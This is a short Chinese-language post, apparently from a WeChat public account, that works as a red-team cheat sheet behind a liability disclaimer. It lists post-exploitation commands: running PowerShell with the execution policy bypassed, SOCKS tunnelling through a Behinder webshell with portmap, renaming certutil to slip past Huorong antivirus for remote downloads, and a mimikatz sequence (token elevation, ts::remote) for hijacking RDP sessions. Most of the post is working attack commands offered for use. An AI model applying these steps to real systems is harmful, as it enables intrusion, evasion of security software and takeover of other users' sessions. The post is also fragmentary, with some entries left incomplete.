免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
知识都了解但是攻防当中命令容易忘,记录一下。
cmd下执行ps1文件绕过系统限制
powershell -ExecutionPolicy Bypass -File
"C:\Users\Desktop\1.ps1"
效果如下:
冰蝎搭建socks隧道
./portmap -p1 2256 -p2 5588 -m 2
Poxifier
火绒绕过
远程下载
copy C:\Windows\System32\certutil.exe certutil1.exe
mimikatz RDP-劫持
ts::sessions 查看当前目标主机存活的会话列表
privilege::debug
token::elevate 提升当前会话的权限级别
ts::remote /id:1 将远程桌面切换到会话ID为1的用户身份中
